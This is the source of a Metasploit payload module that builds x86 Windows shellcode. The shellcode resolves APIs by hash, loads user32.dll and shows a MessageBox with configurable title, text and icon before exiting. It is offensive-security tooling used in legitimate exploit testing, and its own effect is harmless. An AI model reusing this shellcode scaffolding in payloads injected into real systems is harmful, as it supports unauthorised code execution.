Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 231
8

9
  include Msf::Payload::Windows
10
  include Msf::Payload::Single
11
  include Msf::Payload::Windows::BlockApi
12

13
  def initialize(info = {})
14
    super(
15
      merge_info(
16
        info,
17
        'Name' => 'Windows MessageBox',
18
        'Description' => 'Spawns a dialog via MessageBox using a customizable title, text & icon',
19
        'Author' => [
20
          'corelanc0d3r <peter.ve[at]corelan.be>', # original payload module
21
          'jduck' # some ruby factoring
22
        ],
23
        'License' => MSF_LICENSE,
24
        'Platform' => 'win',
25
        'Arch' => ARCH_X86
26
      )
27
    )
28

29
    # Register MessageBox options
30
    register_options(
31
      [
32
        OptString.new('TITLE', [ true, 'Messagebox Title (max 255 chars)', 'MessageBox' ], max_length: 255),
33
        OptString.new('TEXT', [ true, 'Messagebox Text (max 255 chars)', 'Hello, from MSF!' ], max_length: 255),
34
        OptString.new('ICON', [ true, 'Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION', 'NO' ])
35
      ]
36
    )
37
  end
38

39
  #
40
  # Construct the payload
41
  #
42
  def generate(_opts = {})
43
    style = 0x00
44
    case datastore['ICON'].upcase.strip
45
      # default = NO
46
    when 'ERROR'
47
      style = 0x10
48
    when 'QUESTION'
49
      style = 0x20
50
    when 'WARNING'
51
      style = 0x30
52
    when 'INFORMATION'
53
      style = 0x40
54
    end
55

56
    exitfunc_asm = %(
57
        push 0
58
        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
59
        call ebp
60
      )
61
    if datastore['EXITFUNC'].upcase.strip == 'THREAD'
62
      exitfunc_asm = %(
63
        mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
64
        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}
65
        call ebp
66
        add esp,0x28
67
        cmp al,0x6
68
        jl use_exitthread   ; is older than Vista or Server 2003 R2?
69
        cmp bl,0xe0         ; check if GetVersion change the hash stored in EBX
70
        jne use_exitthread
71
        mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}
72
      use_exitthread:
73
        push 0
74
        push ebx
75
        call ebp
76
      )
77
    end
78

79
    payload_data = %(
80
      cld
81
      call start
82
      #{asm_block_api}
83
    start:
84
      pop ebp
85
      call get_user32
86
      db "user32.dll", 0x00
87
    get_user32:
88
      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
89
      call ebp
90
      push #{style}
91
      call get_title
92
      db "#{datastore['TITLE']}", 0x00
93
    get_title:
94
      call get_text
95
      db "#{datastore['TEXT']}", 0x00
96
    get_text:
97
      push 0
98
      push #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')}
99
      call ebp
100
      #{exitfunc_asm}
101
    )
102
    self.assembly = payload_data
103
    super
104
  end
105
end
106

107